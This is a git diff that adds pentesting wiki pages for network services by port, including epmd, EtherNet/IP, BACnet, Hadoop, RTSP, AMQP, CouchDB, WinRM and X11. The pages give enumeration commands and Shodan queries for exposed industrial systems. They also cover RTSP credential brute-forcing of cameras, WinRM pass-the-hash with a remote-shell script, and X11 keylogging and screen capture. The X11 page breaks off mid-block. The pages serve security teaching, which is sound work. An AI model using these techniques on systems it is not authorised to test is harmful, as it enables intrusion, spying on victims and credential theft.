+More information in [https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/](https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/)  
+The author also share a program to brutforce the cookie:
+
+{% file src="../.gitbook/assets/epmd\_bf-0.1.tar.bz2" %}
+
+```bash
+#Metasploit can also exploit this if you know the cookie
+msf5> use exploit/multi/misc/erlang_cookie_rce
+```
+
+### Shodan
+
+* `port:4369 "at port"`
+
diff --git a/pentesting/44818-ethernetip.md b/pentesting/44818-ethernetip.md
new file mode 100644
index 00000000..4a700c38
--- /dev/null
+++ b/pentesting/44818-ethernetip.md
@@ -0,0 +1,28 @@
+# 44818/UDP/TCP - Pentesting EthernetIP
+
+## **Protocol Information**
+
+From Wikipedia article on EtherNet/IP [http://en.wikipedia.org/wiki/EtherNet/IP](http://en.wikipedia.org/wiki/EtherNet/IP)
+
+> EtherNet/IP was developed in the late 1990s by Rockwell Automation as part of Rockwell's industrial Ethernet networking solutions. Rockwell gave EtherNet/IP its moniker and handed it over to ODVA, which now manages the protocol and assures multi-vendor system interoperability by requiring adherence to established standards whenever new products that utilize the protocol are developed today.
+
+> EtherNet/IP is most commonly used in industrial automation control systems, such as for water processing plants, manufacturing facilities and utilities. Several control system vendors have developed programmable automation controllers and I/O capable of communicating via EtherNet/IP.
+
+An EtherNet/IP device is positively identified by querying TCP/44818 with a list Identities Message \(0x63\). The response messages will determine if it is a EtherNet/IP device and parse the information to enumerate the device.  
+From [here](https://github.com/digitalbond/Redpoint)
+
+**Default port:** 44818 UDP/TCP
+
+```text
+PORT      STATE SERVICE
+44818/tcp open  EtherNet/IP
+```
+
+## **Enumeration**
+
+```bash
+nmap -n -sV --script enip-info -p 44818 <IP>
+pip3 install cpppo
+python3 -m cpppo.server.enip.list_services [--udp] [--broadcast] --list-identity -a <IP>
+```
+
diff --git a/pentesting/47808-udp-bacnet.md b/pentesting/47808-udp-bacnet.md
new file mode 100644
index 00000000..b4f55a14
--- /dev/null
+++ b/pentesting/47808-udp-bacnet.md
@@ -0,0 +1,44 @@
+# 47808/udp - Pentesting BACNet
+
+## Protocol Information
+
+**BACnet** is a [communications protocol](https://en.wikipedia.org/wiki/Communications_protocol) for Building Automation and Control \(BAC\) networks that leverage the [ASHRAE](https://en.wikipedia.org/wiki/ASHRAE), [ANSI](https://en.wikipedia.org/wiki/ANSI), and [ISO](https://en.wikipedia.org/wiki/International_Organization_for_Standardization) 16484-5 standard[\[1\]](https://en.wikipedia.org/wiki/BACnet#cite_note-1) protocol.
+
+BACnet was designed to allow communication of [building automation](https://en.wikipedia.org/wiki/Building_automation) and control systems for applications such as heating, ventilating, and air-conditioning control \([HVAC](https://en.wikipedia.org/wiki/HVAC)\), lighting control, access control, and fire detection systems and their associated equipment. The BACnet protocol provides mechanisms for computerized building automation devices to exchange information, regardless of the particular building service they perform.  
+From [Wikipedia](https://en.wikipedia.org/wiki/BACnet)
+
+**Default port:** 47808
+
+```text
+PORT      STATE SERVICE
+47808/udp open  BACNet -- Building Automation and Control NetworksEnumerate
+```
+
+## Enumeration
+
+### Manual
+
+```bash
+pip3 install BAC0
+import BAC0
+bbmdIP = '<IP>:47808'
+bbmdTTL = 900
+bacnet = BAC0.connect(bbmdAddress=bbmdIP, bbmdTTL=bbmdTTL) #Connect
+bacnet.vendorName.strValue
+#I couldn't find how to obtain the same data as nmap with this library or any other
+#talk me if you know how please
+```
+
+### Automatic
+
+```bash
+nmap --script bacnet-info --script-args full=yes -sU -n -sV -p 47808 <IP>
+```
+
+This script does not attempt to join a BACnet network as a foreign device, it simply sends BACnet requests directly to an IP addressable device.
+
+### Shodan
+
+* `port:47808 instance`
+* `"Instance ID" "Vendor Name"`
+
diff --git a/pentesting/50030-50060-50070-50075-50090-pentesting-hadoop.md b/pentesting/50030-50060-50070-50075-50090-pentesting-hadoop.md
new file mode 100644
index 00000000..a0c013da
--- /dev/null
+++ b/pentesting/50030-50060-50070-50075-50090-pentesting-hadoop.md
@@ -0,0 +1,24 @@
+# 50030,50060,50070,50075,50090 - Pentesting Hadoop
+
+**Information taken from the book** [**Network Security Assesment 3rd Edition**](https://www.amazon.com/Network-Security-Assessment-Know-Your-ebook/dp/B01N6E0BG2)\*\*\*\*
+
+## **Basic Information**
+
+Apache Hadoop is an open source framework supporting the distributed storage and processing of large datasets using computer clusters. Storage is handled by the Hadoop Distributed File System \(HDFS\) and processing is performed by using MapReduce and other applications \(e.g., Apache Storm, Flink, and Spark\) via YARN.
+
+![](../.gitbook/assets/image%20%28145%29.png)
+
+Figure 15-1. Hadoop 2.0 architecture
+
+You can query MapReduce and HDFS services by using the Nmap scripts listed in the following table \(including details of the default ports\). At the time of writing, Metasploit does not support Hadoop.
+
+| **Script name** | **Port** | **Purpose** |
+| :--- | :--- | :--- |
+| hadoop-jobtracker-info | 50030 | Retrieve information from MapReduce job and task tracker services |
+| hadoop-tasktracker-info | 50060 |  |
+| hadoop-namenode-info | 50070 | Retrieve info from HDFS name node |
+| hadoop-datanode-info | 50075 | Retrieve info from HDFS data node |
+| hadoop-secondary-namenode-info | 50090 | Retrieve info from HDFS secondary name node |
+
+Lightweight Python and Go HDFS clients are available online. Hadoop runs without authentication by default. You can configure HDFS, YARN, and MapReduce services to use Kerberos.
+
diff --git a/pentesting/512-pentesting-rexec.md b/pentesting/512-pentesting-rexec.md
new file mode 100644
index 00000000..53bcb132
--- /dev/null
+++ b/pentesting/512-pentesting-rexec.md
@@ -0,0 +1,15 @@
+# 512 - Pentesting Rexec
+
+## Basic Information
+
+It is a service that **allows you to execute a command inside a host** if you know valid **credentials** \(username and password\).
+
+**Default Port:** 512
+
+```text
+PORT    STATE SERVICE
+512/tcp open  exec
+```
+
+### \*\*\*\*[**Brute-force**](../brute-force.md#rexec)\*\*\*\*
+
diff --git a/pentesting/515-pentesting-line-printer-daemon-lpd.md b/pentesting/515-pentesting-line-printer-daemon-lpd.md
new file mode 100644
index 00000000..f893b992
--- /dev/null
+++ b/pentesting/515-pentesting-line-printer-daemon-lpd.md
@@ -0,0 +1,13 @@
+# 515 - Pentesting Line Printer Daemon \(LPD\)
+
+The Line Printer Daemon \(LPD\) protocol had originally been introduced in Berkeley Unix in the 80s \(later specified by RFC1179\).  
+The daemon runs on port 515/tcp and can be accessed using the `lpr`command. To print, the client sends a **control file** defining job/username and a **data file** containing the actual data to be printed. The **input type** of the data file can be set in the control file by choosing among **various file formats**. However it is up to the LPD implementation how to actually handle the print data. A popular LPD implementation for Unix-like operating system is LPRng. LPD can be used as a carrier to deploy **malicious PostScript** or **PJL print jobs**. 
+
+The `lpdprint` tool included in [**PRET**](https://github.com/RUB-NDS/PRET) is a minimalist way to print data directly to an LPD capable printer as shown below:
+
+```text
+lpdprint.py hostname filename
+```
+
+If you want to learn more about [**hacking printers read this page**](pentesting-printers/).
+
diff --git a/pentesting/5353-udp-multicast-dns-mdns.md b/pentesting/5353-udp-multicast-dns-mdns.md
new file mode 100644
index 00000000..94475acc
--- /dev/null
+++ b/pentesting/5353-udp-multicast-dns-mdns.md
@@ -0,0 +1,32 @@
+# 5353/UDP Multicast DNS \(mDNS\)
+
+## Basic Information
+
+Apple Bonjour and Linux zero-configuration networking implementations \(e.g., Avahi\) use mDNS to discover network peripherals within the local network.  
+**Default port:** 5353/UDP
+
+```text
+PORT     STATE SERVICE
+5353/udp open  zeroconf
+```
+
+## Enumeration
+
+```text
+nmap -Pn -sUC -p5353 192.168.1.2
+
+Starting Nmap 6.46 (http://nmap.org) at 2015-01-01 10:30 GMT
+Nmap scan report for 192.168.1.2
+PORT     STATE SERVICE
+5353/udp open  zeroconf
+| dns-service-discovery:
+|   9/tcp workstation
+|     Address=192.168.1.2
+|   22/tcp ssh
+|     Address=192.168.1.2
+|   22/tcp sftp-ssh
+|     Address=192.168.1.2
+|   445/tcp smb
+|     Address=192.168.1.2
+```
+
diff --git a/pentesting/554-8554-pentesting-rtsp.md b/pentesting/554-8554-pentesting-rtsp.md
new file mode 100644
index 00000000..ba0c09aa
--- /dev/null
+++ b/pentesting/554-8554-pentesting-rtsp.md
@@ -0,0 +1,89 @@
+# 554,8554 - Pentesting RTSP
+
+## Basic Information
+
+> The **Real Time Streaming Protocol** \(**RTSP**\) is a network control protocol designed for use in entertainment and communications systems to control streaming media servers. The protocol is used for establishing and controlling media sessions between end points. Clients of media servers issue VHS-style commands, such as play, record and pause, to facilitate real-time control of the media streaming from the server to a client \(Video On Demand\) or from a client to the server \(Voice Recording\).
+>
+> The transmission of streaming data itself is not a task of RTSP. Most RTSP servers use the Real-time Transport Protocol \(RTP\) in conjunction with Real-time Control Protocol \(RTCP\) for media stream delivery. However, some vendors implement proprietary transport protocols. The RTSP server software from RealNetworks, for example, also used RealNetworks' proprietary Real Data Transport \(RDT\).
+
+From [wikipedia](https://en.wikipedia.org/wiki/Real_Time_Streaming_Protocol).
+
+**Default ports:** 554,8554
+
+```text
+PORT    STATE SERVICE
+554/tcp open  rtsp
+```
+
+## Detailed Information
+
+First and foremost RTSP is an HTTP like protocol. It has different structure and control commands but is textual in its format and once you learn the basics of the commands and how they interact, fairly easy to use. The specification for RTSP is pretty straightforward. Here is a link to it:
+
+[RTSP – RFC2326](https://tools.ietf.org/html/rfc2326)
+
+RTSP can be accessed unauthenticated \(common in off-the-shelf devices\) or authenticated. Authenticated access mirrors HTTP in that you have Basic and Digest authentication, both nearly identical to HTTP. To find out whether your device is authenticated or unauthenticated, simply send a “DESCRIBE” request. A simple DESCRIBE request looks like:
+
+`DESCRIBE rtsp://<ip>:<port> RTSP/1.0\r\nCSeq: 2\r\n\r\n`
+
+Note: the additional “\r\n” is required for reliable response. Some systems will accept the single “\r\n” but most won’t.
+
+This can be sent down a raw socket. Just like HTTP, a successful response indicating unauthenticated access is available will contain a “200 OK”. In this case with DESCRIBE, it will also contain all of the operational parameters of the video feed.
+
+If the device requires authentication, the the response back will contain “401 Unauthorized”. The response will also indicate what authentication mechanisms are available. If Basic authentication is available the response string will contain an information line that has “WWW-Authenticate: Basic”. The rest of the information provide with Basic authentication is largely irrelevant to actually conduct basic authentication.
+
+If Digest authentication is required, then the “401 Unauthorized” response will have an information line containing “WWW-Authenticate: Digest”. The information with the Digest specification IS very important if you are going to do Digest authentication, so don’t ignore it.
+
+Basic authentication is the way to go, hopefully the response received indicates that it is available. If not there are three different methods to assemble a Digest authentication element, so Digest can become troublesome, especially blind \(unauthenticated\). The rest of this article will stick with Basic authentication. I may write a follow-up article later once I decipher the secret sauce to doing Digest authentication blind.
+
+To formulate a Basic authentication element, one simple has to base 64 encode &lt;username&gt; “:” &lt;password&gt; and add it to the request. So a new request would look like:
+
+`DESCRIBE rtsp://<ip>:<port> RTSP/1.0\r\nCSeq: 2\r\nAuthorization: Basic YWRtaW46MTIzNA==\r\n\r\n`
+
+Again note the request is terminated with the double “\r\n”.
+
+The value YWRtaW46MTIzNA== is the base 64 encoded username and password concatenated with “:”. In this case I have used “admin”/”1234”. Some simple python scripting to try this out looks like:
+
+```python
+import socket
+req = "DESCRIBE rtsp://<ip>:<port> RTSP/1.0\r\nCSeq: 2\r\nAuthorization: Basic YWRtaW46MTIzNA==\r\n\r\n"
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.connect(("192.168.1.1", 554))
+s.sendall(req)
+data = s.recv
+print data
+```
+
+Voila! You have access.
+
+**From:** [**http://badguyfu.net/rtsp-brute-forcing-for-fun-and-naked-pictures/**](http://badguyfu.net/rtsp-brute-forcing-for-fun-and-naked-pictures/)\*\*\*\*
+
+## Enumeration
+
+Lets get information about valid methods and URLs are supported and try to brute-force the access \(if needed\) to get access to the content.
+
+```bash
+nmap -sV --scripts "rtsp-*" -p <PORT> <IP>
+```
+
+### [Brute Force](../brute-force.md#rtsp)
+
+### **Other useful programs**
+
+To bruteforce: [https://github.com/Tek-Security-Group/rtsp\_authgrinder](https://github.com/Tek-Security-Group/rtsp_authgrinder)
+
+**Cameradar**
+
+Cameradar allows you to: 
+
+* Detect open RTSP hosts on any accessible target
+* Get their public info \(hostname, port, camera model, etc.\)
+* Launch automated dictionary attacks to get their stream route \(for example /live.sdp\)
+* Launch automated dictionary attacks to get the username and password of the cameras
+* Generate thumbnails from them to check if the streams are valid and to have a quick preview of their content
+* Try to create a Gstreamer pipeline to check if they are properly encoded
+* Print a summary of all the informations Cameradar could get
+
+[https://github.com/Ullaakut/cameradar](https://github.com/Ullaakut/cameradar)
+
+
+
diff --git a/pentesting/5671-5672-pentesting-amqp.md b/pentesting/5671-5672-pentesting-amqp.md
new file mode 100644
index 00000000..14210470
--- /dev/null
+++ b/pentesting/5671-5672-pentesting-amqp.md
@@ -0,0 +1,65 @@
+# 5671,5672 - Pentesting AMQP
+
+## Basic Information
+
+**RabbitMQ** is a **message-queueing software** also known as a _message broker_ or _queue manager._ Simply said; it is software where queues are defined, to which applications connect in order to transfer a message or messages.  
+A **message can include any kind of information**. It could, for example, have information about a process or task that should start on another application \(which could even be on another server\), or it could be just a simple text message. The queue-manager software stores the messages until a receiving application connects and takes a message off the queue. The receiving application then processes the message.  
+Definition from [here](https://www.cloudamqp.com/blog/2015-05-18-part1-rabbitmq-for-beginners-what-is-rabbitmq.html).
+
+**Default port**: 5672,5671
+
+```text
+PORT     STATE SERVICE VERSION
+5672/tcp open  amqp    RabbitMQ 3.1.5 (0-9)
+```
+
+## Enumeration
+
+### Manual
+
+```python
+import amqp
+#By default it uses default credentials "guest":"guest"
+conn = amqp.connection.Connection(host="<IP>", port=5672, virtual_host="/")
+conn.connect()
+for k, v in conn.server_properties.items():
+    print(k, v)
+```
+
+### Automatic
+
+```bash
+nmap -sV -Pn -n -T4 -p 5672 --script amqp-info <IP>
+
+PORT     STATE SERVICE VERSION
+5672/tcp open  amqp    RabbitMQ 3.1.5 (0-9)
+| amqp-info: 
+|   capabilities: 
+|     publisher_confirms: YES
+|     exchange_exchange_bindings: YES
+|     basic.nack: YES
+|     consumer_cancel_notify: YES
+|   copyright: Copyright (C) 2007-2013 GoPivotal, Inc.
+|   information: Licensed under the MPL.  See http://www.rabbitmq.com/
+|   platform: Erlang/OTP
+|   product: RabbitMQ
+|   version: 3.1.5
+|   mechanisms: PLAIN AMQPLAIN
+|_  locales: en_US
+```
+
+## Other RabbitMQ ports
+
+From [https://www.rabbitmq.com/networking.html](https://www.rabbitmq.com/networking.html) you can find that **rabbitmq uses several ports**:
+
+* **1883, 8883**: \([MQTT clients](http://mqtt.org/) without and with TLS, if the [MQTT plugin](https://www.rabbitmq.com/mqtt.html) is enabled. [**Learn more about how to pentest MQTT here**](1883-pentesting-mqtt-mosquitto.md).
+* **4369: epmd**, a peer discovery service used by RabbitMQ nodes and CLI tools. [**Learn more about how to pentest this service here**](4369-pentesting-erlang-port-mapper-daemon-epmd.md).
+* **5672, 5671**: used by AMQP 0-9-1 and 1.0 clients without and with TLS
+* **15672**: [HTTP API](https://www.rabbitmq.com/management.html) clients, [management UI](https://www.rabbitmq.com/management.html) and [rabbitmqadmin](https://www.rabbitmq.com/management-cli.html) \(only if the [management plugin](https://www.rabbitmq.com/management.html) is enabled\). [**Learn more about how to pentest this service here**](15672-pentesting-rabbitmq-management.md).
+* 15674: STOMP-over-WebSockets clients \(only if the [Web STOMP plugin](https://www.rabbitmq.com/web-stomp.html) is enabled\)
+* 15675: MQTT-over-WebSockets clients \(only if the [Web MQTT plugin](https://www.rabbitmq.com/web-mqtt.html) is enabled\)
+* 15692: Prometheus metrics \(only if the [Prometheus plugin](https://www.rabbitmq.com/prometheus.html) is enabled\)
+* 25672: used for inter-node and CLI tools communication \(Erlang distribution server port\) and is allocated from a dynamic range \(limited to a single port by default, computed as AMQP port + 20000\). Unless external connections on these ports are really necessary \(e.g. the cluster uses [federation](https://www.rabbitmq.com/federation.html) or CLI tools are used on machines outside the subnet\), these ports should not be publicly exposed. See [networking guide](https://www.rabbitmq.com/networking.html) for details. **Only 9 of these ports opened on the internet**.
+* 35672-35682: used by CLI tools \(Erlang distribution client ports\) for communication with nodes and is allocated from a dynamic range \(computed as server distribution port + 10000 through server distribution port + 10010\). See [networking guide](https://www.rabbitmq.com/networking.html) for details.
+* 61613, 61614: [STOMP clients](https://stomp.github.io/stomp-specification-1.2.html) without and with TLS \(only if the [STOMP plugin](https://www.rabbitmq.com/stomp.html) is enabled\). Less than 10 devices with this port open and mostly UDP for DHT nodes.
+
diff --git a/pentesting/584-pentesting-afp.md b/pentesting/584-pentesting-afp.md
new file mode 100644
index 00000000..4d215cfc
--- /dev/null
+++ b/pentesting/584-pentesting-afp.md
@@ -0,0 +1,29 @@
+# 548 - Pentesting Apple Filing Protocol \(AFP\)
+
+## Basic Information
+
+The **Apple Filing Protocol** \(**AFP**\), formerly AppleTalk Filing Protocol, is a proprietary network protocol, and part of the **Apple File Service** \(**AFS**\), that offers file services for macOS and the classic Mac OS. In macOS, AFP is one of several file services supported**.** AFP currently supports Unicode file names, POSIX and access control list permissions, resource forks, named extended attributes, and advanced file locking. In Mac OS 9 and earlier, AFP was the primary protocol for file services.
+
+**Default port:** 548
+
+```text
+PORT    STATE SERVICE
+548/tcp open  afp
+```
+
+## Enumeration
+
+```bash
+msf> use auxiliary/scanner/afp/afp_server_info
+nmap -sV --script "afp-* and not dos and not brute" -p <PORT> <IP>
+```
+
+| **Name** | **Description** |
+| :--- | :--- |
+| afp-ls | Lists available AFP volumes and files |
+| afp-path-vuln | Lists all AFP volumes and files[a](https://learning.oreilly.com/library/view/network-security-assessment/9781491911044/ch15.html#ch15fn48) |
+| afp-serverinfo | Displays AFP server information |
+| afp-showmount | Lists available AFP shares and respective ACLs |
+
+### [**Brute Force**](../brute-force.md#afp)\*\*\*\*
+
diff --git a/pentesting/5984-pentesting-couchdb.md b/pentesting/5984-pentesting-couchdb.md
new file mode 100644
index 00000000..fa0d5314
--- /dev/null
+++ b/pentesting/5984-pentesting-couchdb.md
@@ -0,0 +1,99 @@
+# 5984 - Pentesting CouchDB
+
+## **Basic Information**
+
+CouchDB is a document-oriented database and within each document fields are stored as key-value maps. Fields can be either a simple key/value pair, list, or map.
+
+Each document that is stored in the database is given a document-level unique identifier \(`_id`\) as well as a revision \(`_rev`\) number for each change that is made and saved to the database.
+
+**Default port:** 5984
+
+```text
+PORT      STATE SERVICE REASON
+5984/tcp  open  unknown syn-ack
+```
+
+## **Enumeration**
+
+### **Automatic**
+
+```bash
+nmap -sV --script couchdb-databases,couchdb-stats -p <PORT> <IP>
+msf> use auxiliary/scanner/couchdb/couchdb_enum
+```
+
+### Manual
+
+```text
+curl http://IP:5984/
+```
+
+This issues a GET request to installed CouchDB instance.
+
+The reply should look something like:
+
+```bash
+{"couchdb":"Welcome","version":"0.10.1"}
+```
+
+#### **Database List**
+
+```text
+curl -X GET http://IP:5984/_all_dbs
+```
+
+If that request responds with a 401 unauthorised, then probably you would need some valid credentials to access the database:
+
+```text
+curl -X GET http://user:password@IP:5984/_all_dbs
+```
+
+### \*\*\*\*[**Brute force**](../brute-force.md#couchdb)
+
+Once you have some **valid credentials** \(or if valid unauthenticated access\) the response to _/\_all\_dbs_ should be a list of db names like:
+
+```bash
+["baseball", "plankton"]
+```
+
+#### **Document List**
+
+```text
+curl -X GET http://IP:5984/{dbname}/_all_docs
+```
+
+Response
+
+```bash
+{
+   "offset": 0,
+   "rows": [
+       {
+           "id": "16e458537602f5ef2a710089dffd9453",
+           "key": "16e458537602f5ef2a710089dffd9453",
+           "value": {
+               "rev": "1-967a00dff5e02add41819138abb3284d"
+           }
+       },
+       {
+           "id": "a4c51cdfa2069f3e905c431114001aff",
+           "key": "a4c51cdfa2069f3e905c431114001aff",
+           "value": {
+               "rev": "1-967a00dff5e02add41819138abb3284d"
+           }
+       },
+   ],
+   "total_rows": 2
+}
+```
+
+#### **Read Value Document**
+
+```bash
+curl -X GET http://IP:5984/{dbname}/{id}
+```
+
+## References
+
+* [https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html](https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html)
+
diff --git a/pentesting/5985-5986-pentesting-winrm.md b/pentesting/5985-5986-pentesting-winrm.md
new file mode 100644
index 00000000..986413ae
--- /dev/null
+++ b/pentesting/5985-5986-pentesting-winrm.md
@@ -0,0 +1,210 @@
+---
+description: >-
+  https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm/
+---
+
+# 5985,5986 - Pentesting WinRM
+
+## WinRM
+
+[Windows Remote Management](https://msdn.microsoft.com/en-us/library/windows/desktop/aa384426%28v=vs.85%29.aspx) \(WinRM\) is a Microsoft protocol that allows remote management of Windows machines over HTTP\(S\) using SOAP. On the backend it's utilizing WMI, so you can think of it as an HTTP based API for WMI.
+
+If WinRM is enabled on the machine, it's trivial to remotely administer the machine from PowerShell. In fact, you can just drop in to a remote PowerShell session on the machine \(as if you were using SSH!\)
+
+The easiest way to detect whether WinRM is available is by seeing if the port is opened. WinRM will listen on one of two ports:
+
+* 5985/tcp \(HTTP\)
+* 5986/tcp \(HTTPS\)
+
+If one of these ports is open, WinRM is configured and you can try entering a remote session.
+
+## **Initiating WinRM Session**.
+
+We first have to configure our attack machine to work with WinRM as well. We need to enable it and add any "victims" as trusted hosts. From an elevated PowerShell prompt, run the following two commands:
+
+```text
+Enable-PSRemoting -Force  
+Set-Item wsman:\localhost\client\trustedhosts *  
+```
+
+This adds a wildcard to the trustedhosts setting. Be wary of what that entails. _Note: I also had to change the network type on my attack machine from "Public" to "Work" network._
+
+You can also **activate** WinRM **remotely** _****_using _wmic_:
+
+```text
+wmic /node:<REMOTE_HOST> process call create "powershell enable-psremoting -force"
+```
+
+### Test if configured
+
+Once the attack machine is configured, use the `Test-WSMan` function to test whether the target is configured for WinRM. You should see some information returned about the protocol version and wsmid:
+
+![](../.gitbook/assets/image%20%28230%29.png)
+
+![](../.gitbook/assets/image%20%28206%29.png)
+
+In this case the first one is configured and the second isn't.
+
+### Execute a command
+
+Now we can use PowerShell's `Invoke-Command` to remotely execute a command on the target over WinRM. To remotely run `ipconfig` and see the output:
+
+```text
+Invoke-Command -computername computer-name.domain.tld -ScriptBlock {ipconfig /all} [-credential DOMAIN\username]
+```
+
+![](../.gitbook/assets/image%20%2819%29.png)
+
+You can also **execute a command of your current PS console via** _**Invoke-Command**_. Suppose that you have locally a function called _**enumeration**_ and you want to **execute it in a remote computer**, you can do:
+
+```ruby
+Invoke-Command -ComputerName <computername> -ScriptBLock ${function:enumeration} [-ArgumentList "arguments"] 
+```
+
+### Execute a Script
+
+```ruby
+Invoke-Command -ComputerName <computername> -FilePath C:\path\to\script\file [-credential CSCOU\jarrieta]
+```
+
+### Get a PS session
+
+Or, if you want to drop right into an interactive PowerShell session, use the `Enter-PSSession` function:
+
+```ruby
+Enter-PSSession -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local [-Credential username]
+```
+
+![](../.gitbook/assets/image%20%2892%29.png)
+
+**The session will run in a new process \(wsmprovhost\) inside the "victim"** 
+
+###  **Forcing WinRM Open**
+
+If you really want to use PS Remoting and WinRM but the target isn't configured for it, you could "force" it on through a single command. I wouldn't recommend this but if you really wanted to use WinRM or PSRemoting than by all means do it this way. For example, using PSExec:
+
+```text
+PS C:\tools\SysinternalsSuite> .\PsExec.exe \\computername -u domain\username -p password -h -d powershell.exe "enable-psremoting -force"  
+```
+
+Now we can enter a remote PS session on the victim.
+
+### Saving and Restoring sessions
+
+This **won't work** if the the **language** is **constrained** in the remote computer.
+
+```ruby
+#You can save a session inside a variable
+$sess1 = New-PSSession -ComputerName <computername>
+#And restore it at any moment doing
+Enter-PSSession -Session $sess1
+```
+
+Inside this sessions you can load PS scripts using _Invoke-Command_
+
+```ruby
+Invoke-Command -FilePath C:\Path\to\script.ps1 -Session $sess1
+```
+
+### Errors
+
+If you find the following error:
+
+`enter-pssession : Connecting to remote server 10.10.10.175 failed with the following error message : The WinRM client cannot process the request. If the authentication scheme is different from Kerberos, or if the client computer is not joined to a domain, then HTTPS transport must be used or the destination machine must be added to the TrustedHosts configuration setting. Use winrm.cmd to configure TrustedHosts. Note that computers in the TrustedHosts list might not be authenticated. You can get more information about that by running the following command: winrm help config. For more information, see the about_Remote_Troubleshooting Help topic.`
+
+The try on the client \(info from [here](https://serverfault.com/questions/657918/remote-ps-session-fails-on-non-domain-server)\):
+
+```ruby
+winrm quickconfig
+winrm set winrm/config/client '@{TrustedHosts="Computer1,Computer2"}'
+```
+
+## WinRM connection in linux
+
+### Using evil-winrm
+
+```ruby
+gem install evil-winrm
+```
+
+Read **documentation** on its github: [https://github.com/Hackplayers/evil-winrm](https://github.com/Hackplayers/evil-winrm)
+
+```ruby
+evil-winrm -u Administrator -p 'EverybodyWantsToWorkAtP.O.O.'  -i <IP>/<Domain>
+```
+
+To use evil-winrm to connect to an **IPv6 address** create an entry inside _**/etc/hosts**_ setting a **domain name** to the IPv6 address and connect to that domain.
+
+### Pass the hash with evil-winrm
+
+```ruby
+evil-winrm -u <username> -H <Hash> -i <IP>
+```
+
+![](../.gitbook/assets/image%20%2835%29.png)
+
+### Using a PS-docker machine
+
+```text
+docker run -it quickbreach/powershell-ntlm
+$creds = Get-Credential
+Enter-PSSession -ComputerName 10.10.10.149 -Authentication Negotiate -Credential $creds
+```
+
+### Using a ruby script
+
+Code extracted from here: [https://alamot.github.io/winrm\_shell/](https://alamot.github.io/winrm_shell/)
+
+```ruby
+require 'winrm-fs'
+
+# Author: Alamot
+# To upload a file type: UPLOAD local_path remote_path
+# e.g.: PS> UPLOAD myfile.txt C:\temp\myfile.txt
+
+
+conn = WinRM::Connection.new( 
+  endpoint: 'https://IP:PORT/wsman',
+  transport: :ssl,
+  user: 'username',
+  password: 'password',
+  :no_ssl_peer_verification => true
+)
+
+
+class String
+  def tokenize
+    self.
+      split(/\s(?=(?:[^'"]|'[^']*'|"[^"]*")*$)/).
+      select {|s| not s.empty? }.
+      map {|s| s.gsub(/(^ +)|( +$)|(^["']+)|(["']+$)/,'')}
+  end
+end
+
+
+command=""
+file_manager = WinRM::FS::FileManager.new(conn)
+
+
+conn.shell(:powershell) do |shell|
+    until command == "exit\n" do
+        output = shell.run("-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')")
+        print(output.output.chomp)
+        command = gets
+        if command.start_with?('UPLOAD') then
+            upload_command = command.tokenize
+            print("Uploading " + upload_command[1] + " to " + upload_command[2])
+            file_manager.upload(upload_command[1], upload_command[2]) do |bytes_copied, total_bytes, local_path, remote_path|
+                puts("#{bytes_copied} bytes of #{total_bytes} bytes copied")
+            end
+            command = "echo `nOK`n"
+        end
+        output = shell.run(command) do |stdout, stderr|
+            STDOUT.print(stdout)
+            STDERR.print(stderr)
+        end
+    end    
+    puts("Exiting with code #{output.exitcode}")
+end
+```
+
diff --git a/pentesting/6000-pentesting-x11.md b/pentesting/6000-pentesting-x11.md
new file mode 100644
index 00000000..d9f9286c
--- /dev/null
+++ b/pentesting/6000-pentesting-x11.md
@@ -0,0 +1,132 @@
+# 6000 - Pentesting X11
+
+## Basic Information
+
+The X Window System \(aka X\) is a windowing system for bitmap displays, which is common on UNIX-based operating systems. X provides the basic framework for a GUI based environment. X also does not mandate the user interface – individual programs handle this.  
+From: [https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/\#gref](https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref)
+
+**Default port:** 6000
+
+```text
+PORT       STATE   SERVICE
+6000/tcp   open    X11
+```
+
+## Enumeration
+
+Check for **anonymous connection:**
+
+```bash
+nmap -sV --script x11-access -p <PORT> <IP>
+msf> use auxiliary/scanner/x11/open_x11
+```
+
+## Verfy Connection
+
+```bash
+xdpyinfo -display <ip>:<display>
+xwininfo -root -tree -display <IP>:<display> #Ex: xwininfo -root -tree -display 10.5.5.12:0
+```
+
+## Keyloggin
+
+[xspy](http://tools.kali.org/sniffingspoofing/xspy) to sniff the keyboard keystrokes.
+
+Sample Output:
+
+```text
+xspy 10.9.xx.xx
+
+opened 10.9.xx.xx:0 for snoopng
+swaBackSpaceCaps_Lock josephtTabcBackSpaceShift_L workShift_L 2123
+qsaminusKP_Down KP_Begin KP_Down KP_Left KP_Insert TabRightLeftRightDeletebTabDownnTabKP_End KP_Right KP_Up KP_Down KP_Up KP_Up TabmtminusdBackSpacewinTab
+```
+
+## Screenshots capturing
+
+```bash
+xwd -root -screen -silent -display <TargetIP:0> > screenshot.xwd
+convert screenshot.xwd screenshot.png
+```
+
+## Remote Desktop View
+
+Way from: [https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/\#gref](https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref)
+
+```text
+./xrdp.py <IP:0>
+```
+
+Way from: [https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html](https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html)
+
+First we need to find the ID of the window using xwininfo
+
+```text
+xwininfo -root -display 10.9.xx.xx:0
+
+xwininfo: Window id: 0x45 (the root window) (has no name)
+
+Absolute upper-left X:  0
+Absolute upper-left Y:  0
+Relative upper-left X:  0
+Relative upper-left Y:  0
+Width: 1024
+Height: 768
+Depth: 16
+Visual: 0x21
+Visual Class: TrueColor
+Border width: 0
+Class: InputOutput
+Colormap: 0x20 (installed)
+Bit Gravity State: ForgetGravity
+Window Gravity State: NorthWestGravity
+Backing Store State: NotUseful
+Save Under State: no
+Map State: IsViewable
+Override Redirect State: no
+Corners:  +0+0  -0+0  -0-0  +0-0
+-geometry 1024x768+0+0
+```
+
+**XWatchwin**
+
+For **live viewing** we need to use
+
+```bash
